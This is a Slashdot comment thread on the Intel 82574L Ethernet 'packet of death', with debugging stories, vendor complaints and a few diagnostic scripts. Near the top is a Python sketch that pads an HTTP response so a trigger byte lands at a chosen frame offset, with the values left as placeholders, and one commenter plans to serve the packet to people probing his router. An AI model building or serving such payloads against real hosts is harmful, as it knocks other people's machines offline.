Intel Networking Bug

Intel Gigabit NIC Packet of Death

An anonymous reader sends this quote from a blog post about a very odd technical issue and some clever debugging: "Packets of death. I started calling them that because that’s exactly what they are. ... This customer location, for some reason or another, could predictably bring down the ethernet controller with voice traffic on their network. Let me elaborate on that for a second. When I say “bring down” an ethernet controller I mean BRING DOWN an ethernet controller. The system and ethernet interfaces would appear fine and then after a random amount of traffic the interface would report a hardware error (lost communication with PHY) and lose link. Literally the link lights on the switch and interface would go out. It was dead. Nothing but a power cycle would bring it back. ... While debugging with this very patient reseller I started stopping the packet captures as soon as the interface dropped. Eventually I caught on to a pattern: the last packet out of the interface was always a 100 Trying provisional response, and it was always a specific length. Not only that, I ended up tracing this (Asterisk) response to a specific phone manufacturer’s INVITE. ... With a modified HTTP server configured to generate data carrying the triggering byte value at the right offset (based on headers, host, etc) you could easily configure an HTTP 200 response to contain the packet of death — and kill client machines behind firewalls!"
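The summary leaves out the specific byte value and offset; purely as an illustration of the padding idea it describes, here is a minimal Python sketch that builds an HTTP 200 response so a chosen byte value lands at a chosen absolute offset of the frame carrying it. TRIGGER_OFFSET and TRIGGER_BYTE are placeholders (the real values are in the linked blog post), and the fixed header sizes assume no IP/TCP options and a response that fits in a single TCP segment.

    # Hypothetical sketch of the padding idea described above, not the author's code.
    # TRIGGER_OFFSET and TRIGGER_BYTE are placeholders; header sizes assume no
    # IP/TCP options and that the whole response travels in one TCP segment.
    ETH_HDR = 14          # Ethernet II header
    IP_HDR = 20           # IPv4 header without options
    TCP_HDR = 20          # TCP header without options

    TRIGGER_OFFSET = 0x47F   # placeholder: absolute offset within the frame
    TRIGGER_BYTE = 0x32      # placeholder: the byte value that matters

    def build_response(trigger_offset=TRIGGER_OFFSET, trigger_byte=TRIGGER_BYTE):
        """Return HTTP response bytes that place trigger_byte at trigger_offset
        of the Ethernet frame carrying them (under the assumptions above)."""
        base = ("HTTP/1.1 200 OK\r\n"
                "Content-Type: application/octet-stream\r\n")
        # The Content-Length digits change the header size, so search for a
        # body length that is self-consistent and long enough to reach the offset.
        for body_len in range(1, 65536):
            headers = base + f"Content-Length: {body_len}\r\n\r\n"
            body_start = ETH_HDR + IP_HDR + TCP_HDR + len(headers)
            pad = trigger_offset - body_start
            if 0 <= pad < body_len:
                body = bytearray(body_len)        # zero-filled padding
                body[pad] = trigger_byte          # the one byte that matters
                return headers.encode("ascii") + bytes(body)
        raise ValueError("offset not reachable with these header assumptions")

    if __name__ == "__main__":
        print(f"built a {len(build_response())}-byte response")
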
  • Ouch (Score:5, Insightful)

    by Anonymous Coward on Wednesday February 06, 2013 @05:07PM (#42813479)

    I think an actual summary would have been a vast improvement over TFS.

    • The summary is pretty much word-for-word copy-pasta from his blog... minus any of the useful formatting.

      • Re:Ouch (Score:5, Insightful)

        by whois ( 27479 ) on Wednesday February 06, 2013 @05:26PM (#42813721) Homepage

        It's pretty bad even by Slashdot standards:

        'Let me elaborate on that for a second. When I say “bring down” an ethernet controller I mean BRING DOWN an ethernet controller.'

        This statement is worse than useless; it's a waste of space and a waste of your time to read it (I'm sorry I quoted it). The next sentence is okay, but then they go back to 'Literally the link lights on the switch and interface would go out. It was dead.'

        Literally, this is a waste of the word literally. And it being dead was implied by everything stated above. The rest is informative but still in a conversational style that makes it hard to read, and it's lacking in details such as:

        What model of Ethernet controller was tested? What firmware version are they using? Has the problem been reported to Intel?

        • Re:Ouch (Score:4, Informative)

          by chevelleSS ( 594683 ) on Wednesday February 06, 2013 @05:42PM (#42813891) Homepage
          If you read further down in the article, you would know that they worked with Intel and were given a patch to fix this issue. Brandon
        • tl;dr

        • Re:Ouch (Score:5, Informative)

          by el borak ( 263323 ) on Wednesday February 06, 2013 @05:48PM (#42813961)

          What model of Ethernet controller was tested? What firmware version are they using? Has the problem been reported to Intel?

          I realize you found the article difficult to read, but it wasn't that long. 2/3 of your questions were addressed in the article.

          • Ethernet controller? 82574L
          • Reported? Yes, and Intel supplied an EEPROM fix.
          • What model of Ethernet controller was tested? What firmware version are they using? Has the problem been reported to Intel?

            I realize you found the article difficult to read, but it wasn't that long. 2/3 of your questions were addressed in the article.

            • Ethernet controller? 82574L
            • Reported? Yes, and Intel supplied an EEPROM fix.

            It's Slashdot. Most people don't even read the whole summary before asking questions like that.

            • Re:Ouch (Score:5, Funny)

              by WarJolt ( 990309 ) on Wednesday February 06, 2013 @07:22PM (#42815017)

              Less /. bashing, more Intel bashing, please.

              • Intel needs to be bashed, IMO. They had that recent Core CPU bug, now this network bug, and they're ending the option of buying the motherboard and CPU separately. You see those articles everywhere, while AMD has yelled at the top of its lungs that it isn't doing that and will keep offering the same things to enthusiasts building their own boards. I don't know why people act like Intel is the be-all and end-all; they're definitely not, yet the articles fail to mention that. There's absolutely nothing wrong with AMD components.

            • Most people do not read the TITLE of the article before they start to bash. Never mind the summary.

          • Too bad Intel gave a fix to them (a fix they ultimately couldn't use) but hasn't given it to anyone else. (A sketch for fingerprinting a card's EEPROM, to tell whether an update actually changed it, follows this sub-thread.)

            Too bad Intel has also apparently known about the problem for months now.

            "Intel has been aware of this issue for several months. They also have a fix. However, they haven't publicized it because they don't know how widespread it is."

            Bullshit. I bet they were hoping to very quietly roll it into a driver update and have it all go away.

            • by TheLink ( 130905 )
              Maybe the spooks told them to keep the bug unfixed in the wild ;).
            • I don't think it is too bad. I'm going to use this for the router login screen and expose it to the world.

              Imagine how many script kiddies and infected drones will go down when they probe my ports and try to connect. I can imagine the look on their faces when they lose connection for trying to "hack" into someone's network.

            • Bullshit. I bet they were hoping to very quietly roll it into a driver update and have it all go away.

              Yes, that would be ideal for everyone. If it just silently went away, that also means it wasn't much of a problem... it means it didn't get used as a massive exploit. That's good.

              There is no scenario where 'going away' is a bad thing, unless you're just all angsty and looking for a reason to tell 'the man' how much he sucks.
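Since the posts above say the fix Intel supplied was an EEPROM update, here is a minimal sketch (assuming a Linux host with ethtool installed; "eth0" is a placeholder interface name, and reading the EEPROM needs root) for fingerprinting a card's EEPROM so you can tell whether an update actually changed the image.

    #!/usr/bin/env python3
    # Hedged sketch, not Intel's tooling: dump a NIC's EEPROM via ethtool and
    # hash it, so the image can be compared before and after applying a
    # vendor-supplied update. "eth0" is a placeholder interface name.
    import hashlib
    import subprocess

    def eeprom_dump(iface="eth0"):
        """Return the textual EEPROM dump produced by `ethtool -e <iface>`."""
        result = subprocess.run(["ethtool", "-e", iface],
                                capture_output=True, text=True, check=True)
        return result.stdout

    def eeprom_fingerprint(iface="eth0"):
        """SHA-256 of the dump; a different fingerprint means the image changed."""
        return hashlib.sha256(eeprom_dump(iface).encode()).hexdigest()

    if __name__ == "__main__":
        print(eeprom_fingerprint("eth0"))
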

        • by noc007 ( 633443 )

          82574L was the Intel NIC.

          I'm surprised that Intel NICs are held in such high regard, yet there are some really detrimental bugs.

          CSB:
          I just bought a three port daughterboard for a Jetway ITX mobo I am planning on using as a pfSense FW. Their Gen2 daughterboard uses this chip, but thankfully I didn't spend the extra $50 on the Gen2 compatible board and went with a Gen1 that uses 82541PI. Hopefully that one doesn't have the same issue.

          • by Anonymous Coward

            The 82541 has worse bugs and worse performance. Besides, the 82574L is used instead of the Realtek RTL81xx and its ilk. The RTL81xx crap is MUCH worse, as it is unfixable: slow, dumb, and it requires severe performance-reducing measures (dumbing it down to Fast Ethernet-like levels of hardware assistance) just to survive without causing rogue PCI master transactions (a.k.a. rogue DMA over whatever is after the packet buffer). You cannot even use that RTL LOM NIC with jumbo frames without risking PCIe stalls.

          • Re:Ouch (Score:5, Informative)

            by sirsnork ( 530512 ) on Wednesday February 06, 2013 @07:48PM (#42815233)

            Intel NICs are held in high regard because a) they are fixed when a problem is found, and b) the bugs are documented.

            You should have a look through some of the CPU errata on Intel's site. It'll open your eyes as to just how many bugs a desktop CPU has even once it's shipped.

            • Too bad 3Com isn't around anymore. Well, not in any meaningful way. They used to rock this world.

  • by eksith ( 2776419 ) on Wednesday February 06, 2013 @05:10PM (#42813537) Homepage

    Whether it's your brand of switch, motherboard or even memory, never have the same across all machines if you can help it. The only time I'd recommend the same brand would be hard drives (due to concurrency issues), but then at least try to get them from different batches. If your lot of mobos will only handle one brand of memory for whatever reason, even when CAS latency is identical, then have two machines doing whatever it is you need to be doing.

    One kind of anything makes it easier to kill you swiftly in the end, whether it's by a ping of death or a biological disease.

    • by LordLimecat ( 1103839 ) on Wednesday February 06, 2013 @05:20PM (#42813673)

      One kind of thing makes it a zillion times easier to recognize a problem when it crops up, and makes it so you only ever have to troubleshoot an issue once.

      How much more awful would it be if something similar happened next week on more computers, and he had to troubleshoot it all over again-- not even knowing whether the machines had NICs in common?

      "Everything blew up" is a problem. "Everything blew up, I dont know why, and it will take 3 weeks to find a solution" is a huge problem. "Everything blew up AGAIN, and I it will take another 3 weeks because our environment is heterogenous" means you are out of a job.

      • by eksith ( 2776419 ) on Wednesday February 06, 2013 @05:48PM (#42813965) Homepage

        There's a good reason a lot of our equipment is slightly older. No, we don't use ancient stuff, but it's not 100% top-of-the-line, made-yesterday gear either. And that's because each time a new mobo, memory and storage combo that looks like it's worth purchasing comes to market, the first thing we do is run a few sample sets under everything we can throw at them. Usually problems are narrowed down within the first couple of weeks or so, but that's why we have separate people just for testing equipment.

        Now admittedly, it's getting harder with this economy, so we have some people doing double duty on occasion (I've had to do a bit too when the flu came rolling in), but testing goes on for as long as we think is necessary before the combo goes live. We avoid a lot of the headaches that come with large deployments by keeping changes isolated to maybe 10-15 nodes at a time. It's a slow and steady rollout of mostly similar systems (maybe 3-4 identical) that helps us avoid downtime.

        We're not Google and we don't pretend to be, but common sense goes a long way toward avoiding hiccups like "everything blew up". I think the biggest issue was when Hurricane Sandy hit and we weren't sure if the backup generators would come online (this is a big problem with things that need fuel and oil but stay off for a long time), so we brought in a generator truck for that too, just in case. Again, avoiding one of anything.

        • by rot26 ( 240034 )
          Are We the Imperial We or the Editorial We?

          Curious.
        • Sounds like you've found the balance point between bleeding edge (things are broken/buggy) and outdated (no longer supported/available).

          I wish more people would favor this approach. It would save money and time down the road, i.e. a planned upgrade path.

        • by antdude ( 79039 )

          Also, it's cheaper with older ones. I don't buy the latest stuff either; I want the stable and cheap ones. Also, older stuff has its issues worked out and known. I stopped being first in line unless I get paid to use and test. :P

    • Replacements (Score:3, Insightful)

      by phorm ( 591458 )

      Errrr, no. Have you ever tried to deal with replacements and/or issues within a large organization where everything is different? It's hellish.

      Try tracking an issue across an enterprise when all the architecture is DIFFERENT. You also don't want to mix RAM, and drivers can be a real b**** across different motherboards. Oh, and RMA'ing things: not fun.

      Different brands of RAM. Yeah, you try a rack full of servers playing mix'n'match and see how well that works.

      Lastly... how many vendors/brands of e

      • by eksith ( 2776419 )

        See my reply to LordLimecat above.

        All machines get a barcode that lets us pull up every component that went in, vendors, dates of installation and who touched what. For memory, I think we have 3 different vendors. Mobos are usually Asus and Supermicro, with one or two Tyan. HDs are Samsung and WD, with a couple more for SSDs that are special cases. Speaking of cases, we have Supermicro again and NORCO (for storage) primarily, with a few Antec cases here and there.

        L3 switches are Cisco and Netgear, L2 is Netgear

    • Whether it's your brand of switch, motherboard or even memory, never have the same across all machines if you can help it. The only time I'd recommend the same brand would be hard drives (due to concurrency issues), but then at least try to get them from different batches.

      ...and then along comes something like the Seagate 7200.11 firmware bug from a few years back, which caused all drives of several related models to self-brick after a period of time.

    • by wbr1 ( 2538558 )
      tl;dr: monocultures suck.
  • QOTD (Score:5, Funny)

    by jlv ( 5619 ) on Wednesday February 06, 2013 @05:12PM (#42813561)

    ``Life is too short to be spent debugging Intel parts.''
                                    -- Van Jacobson

  • Wasn't there an old program (Nuke 'em on the Mac, I think) that would send out-of-band data (whatever that was) and crash the TCP/IP stack on Windows NT 3.51? There was another program on Linux called Pam Slam or something like that, which would also bring down NT servers... Very popular in the early days of the web for bringing down your competitor's website.

    • by Anonymous Coward
      As I recall, it was "WinNuke [wikipedia.org]", and it was best known for killing Windows 9x systems (though it seemingly also killed Windows 3.1 and early versions of Windows NT).
  • I would be curious to know if other versions like the Intel 82576 have the same vulnerability. Maybe we should crowdsource this and people can post what they've tested and whether they saw the same behavior (a sketch for gathering the relevant controller and firmware details follows this sub-thread).

    • by tippe ( 1136385 )

      FWIW, the 82580 doesn't seem to have this problem (that, or we have up-to-date EEPROMs that fix the issue...)

    • by ewieling ( 90662 )
      The Intel 82580 does not appear to have the same issue. All our network problems went away when we put some cards based on that chip into our systems, which had used the Intel 82574L for the onboard LAN. Customers stopped screaming, sales stopped screaming, management stopped screaming, and I was able to get some sleep.
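For anyone posting results, a minimal sketch (assuming a Linux host with lspci and ethtool available; "eth0" is a placeholder interface name) that gathers the controller model plus driver and firmware versions worth including in a report:

    #!/usr/bin/env python3
    # Hedged sketch for collecting the details worth posting when reporting
    # whether a given Intel controller shows the problem. Assumes a Linux host
    # with lspci and ethtool; "eth0" is a placeholder interface name.
    import subprocess

    def intel_nics():
        """List Intel (vendor 0x8086) Ethernet controllers on the PCI bus."""
        out = subprocess.run(["lspci", "-nn", "-d", "8086:"],
                             capture_output=True, text=True, check=True).stdout
        return [line for line in out.splitlines() if "Ethernet controller" in line]

    def driver_info(iface="eth0"):
        """Return driver name/version and NIC firmware version for an interface."""
        out = subprocess.run(["ethtool", "-i", iface],
                             capture_output=True, text=True, check=True).stdout
        return dict(line.split(": ", 1) for line in out.splitlines() if ": " in line)

    if __name__ == "__main__":
        for nic in intel_nics():
            print(nic)
        info = driver_info("eth0")
        print("driver:", info.get("driver"), info.get("version"),
              "firmware:", info.get("firmware-version"))
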
  • Nice debugging (Score:5, Interesting)

    by Dishwasha ( 125561 ) on Wednesday February 06, 2013 @05:58PM (#42814079)

    I for one definitely appreciate the diligence of Kristian Kielhofner. Many years ago I was supporting a medium-sized hospital whose flat network kept having intermittent issues (and we all know intermittent issues are the worst to hunt down and resolve). Fortunately I was on-site that day and at the top of my game, and after doing some Ethereal sleuthing (that's what Wireshark was called at the time), I happened to discover a NIC that was spitting out bad LLC frames. Doing some port tracking in the switches, we were able to isolate which port it was on, which happened to be at their campus across the street. Of all possible systems, the offending NIC was in their PACS. After pulling the PACS off the network for a while the problem went away, and we had to get the vendor to replace the hardware.

  • by Zemplar ( 764598 ) on Wednesday February 06, 2013 @06:22PM (#42814349) Journal
    I'm glad Mr. Kielhofner contacted Intel about this issue and had Intel confirm the bug.

    Some years ago I had been diagnosing similar server NIC issues, and after many hours of digging, Intel was able to determine the fault was due to the four-port server NIC being counterfeit. Damn good-looking counterfeit part! I couldn't tell the difference between a real Intel NIC and the counterfeit in front of me. Only with Intel's document specifying the very minor outward differences between a real part and a known counterfeit could I tell them apart.

    Intel NIC debugging step #1 = verify it's a real Intel NIC!
  • Intel NICs have (or at least had...) a very good reputation for performance and stability. Maybe this is a sign that their QA is starting to slip?
    • by SIGBUS ( 8236 )

      Maybe this is a sign that their QA is starting to slip?

      It wouldn't surprise me (but the problem may go well beyond Intel). Of the three motherboards that have ever failed on me over 30+ years, two were Intel (a D101GGC and a DG43NB). Neither of them was ever run from a crap PSU, and both had blown capacitors. Even weirder, the caps were all from respected capacitor firms (Nippon Chemi-Con on the DG43NB and Matsushita on the D101GGC). I guess it's a Good Thing that Intel is exiting the motherboard business.

      The third board that failed was an Abit KT7-RAID... one

      • Maybe whoever was building their boards for them got some counterfeit caps. In my experience, the worst brands for capacitor problems were MSI, Abit, and FIC. ECS was notorious as well, but I never owned one personally. But apparently nobody was immune; I've had a couple of Asus boards that developed cap issues, as well as other random gear from that era (Netgear Ethernet switches/routers, etc.)
    • I've worked a fair bit with the latest 1-Gig and 10-Gig parts (i350 and 82599). They seem pretty decent and stable, good enough for telecom use, though like all chips they do have a list of errata.

      The developers are fairly active about updating the linux drivers in the core kernel as well as on sourceforge. The new chips (the 10-gig one especially) are very flexible but this means the drivers are getting a lot more complex than they used to be. (The programming manual for the 82599 is 900 pages.)

  • Really?!?! (Score:4, Funny)

    by Anonymous Coward on Wednesday February 06, 2013 @07:07PM (#42814871)
    So by "bring down" you didn't just mean bring down, implying it was brought down, but you meant "BRING DOWN" (notice the caps), implying it was brought down (notice the italics). Such a critical distinction. If it was merely "brought down" this would hardly have been an issue. You could have simply ignored the dead router. As it stands, being brought down, this is a real problem, and you cannot ignore the dead router. Good job!
  • by Anonymous Coward

    I ran into a tg3 bug where the tg3 firmware took the byte value that it expected for a destination port number and redirected UDP packets with that value at that location to the BMC/SMDC/IPMI card (as designed). The issue was that the firmware did not appear to understand that a UDP datagram can be up to 64k, i.e. up to ~40 1500-byte packets, and it was always looking for the destination port on all packets (not just the first, as it should have been), so if the data in a later fragment happened to match the expected value, those packets got redirected to the BMC as well.
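To make the fragmentation point concrete, here is a small self-contained illustration (plain Python, not the tg3 firmware; the port number and sizes are arbitrary examples): only the first IP fragment of a large UDP datagram carries the 8-byte UDP header, so a filter that reads a "destination port" from the same offset of every fragment is really matching payload bytes in the later fragments.

    # Illustration only: split a large UDP datagram into IP-fragment-sized
    # chunks and show that only the first chunk carries the real UDP header.
    # The port number and sizes are arbitrary examples.
    import struct

    WATCHED_PORT = 623     # example port a BMC pass-through filter might watch
    MTU_PAYLOAD = 1480     # bytes of IP payload per fragment (typical 1500 MTU)

    # One UDP datagram: 8-byte header + ~7.5 KB of payload. Plant the watched
    # value where it will land at bytes 2..3 of the *second* fragment, i.e. at
    # payload offset (MTU_PAYLOAD - 8) + 2.
    payload = bytearray(7500)
    payload[MTU_PAYLOAD - 8 + 2 : MTU_PAYLOAD - 8 + 4] = struct.pack("!H", WATCHED_PORT)
    udp_header = struct.pack("!HHHH", 12345, WATCHED_PORT, 8 + len(payload), 0)
    datagram = udp_header + payload

    # Split the datagram the way the IP layer would.
    fragments = [datagram[i:i + MTU_PAYLOAD] for i in range(0, len(datagram), MTU_PAYLOAD)]

    for i, frag in enumerate(fragments):
        # A naive per-packet filter reads the "destination port" from bytes 2..3.
        seen = struct.unpack("!H", bytes(frag[2:4]))[0]
        kind = "real UDP header" if i == 0 else "payload bytes"
        print(f"fragment {i}: bytes 2..3 = {seen:5d} ({kind})")
    # Fragment 0 shows 623 legitimately; fragment 1 also shows 623, but those
    # bytes are payload data that a per-fragment filter would misinterpret.
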

  • My worry about Intel, or possibly the nation where the manufacturing happens, is that code was added to the chip to respond to a highly unlikely sequence. Then, when you need to kill a large number of computers, you simply hit various web servers so that they send back the required packet. If a nation is protected by a centralized firewall, this approach will not be that useful. However, against nations that do not have a centralized firewall/router, it could be used to take down a nation.
  • Maybe, just maybe, some frames could trigger an internal monitoring or debugging mode on the controller? Sometimes, manufacturers would want to remotely diagnose hardware, and that could be a way to do it. Of course, it could also be something else, much more sinister like, say, some obscure government backdoor. Not saying that this applies to this particular case, but since most silicon designs aren't open source, we can't be sure there's no such thing in there, lurking, waiting to be activated.
  • IIRC, this is a known issue for certain chipsets; disabling power management in the BIOS for the PCIe port the interface is attached to is the known workaround.
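The workaround described above is a BIOS setting; for reference only, here is a minimal, Linux-specific sketch (it assumes the kernel exposes /sys/module/pcie_aspm/parameters/policy) for checking which PCIe ASPM link power management policy the OS side is currently using.

    # Reference sketch only: the poster's workaround is a BIOS setting, not this.
    # Reads the Linux kernel's global PCIe ASPM (link power management) policy.
    from pathlib import Path

    ASPM_POLICY = Path("/sys/module/pcie_aspm/parameters/policy")

    def current_aspm_policy():
        """Return (active policy, full line); the active policy is shown in
        brackets, e.g. 'default performance [powersave]'."""
        text = ASPM_POLICY.read_text().strip()
        active = text[text.index("[") + 1 : text.index("]")]
        return active, text

    if __name__ == "__main__":
        active, line = current_aspm_policy()
        print("available:", line)
        print("active policy:", active)
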
  • I started stopping the packet captures as soon as the interface dropped

    Yes, that's usually when my packet captures stop, too.

  • Rules for adblock plus:
    ibtimes.co.uk##.ibt_con_artaux.f_rht
    ibtimes.co.uk###bg_header
    ibtimes.co.uk##.fb-like.fb_edge_widget_with_comment.fb_iframe_widget
    ibtimes.co.uk##.twitter-follow-button.twitter-follow-button
    ibtimes.co.uk##IMG[style="border:0;width:20px;height:20px; margin-top:-10px;"]
    ibtimes.co.uk###scrollbox
    ibtimes.co.uk###taboola-grid-3x2
    ibtimes.co.uk##.f_lft.morebox
    ibtimes.co.uk###wrap_bottom
    ibtimes.co.uk##.bk_basic.bk_disqus
  • We posted the offending packet on CloudShark, with links to all of Kristian's articles. Check it out here: http://appliance.cloudshark.org/news/cloudshark-in-the-wild/intel-packet-of-death-capture/ [cloudshark.org]
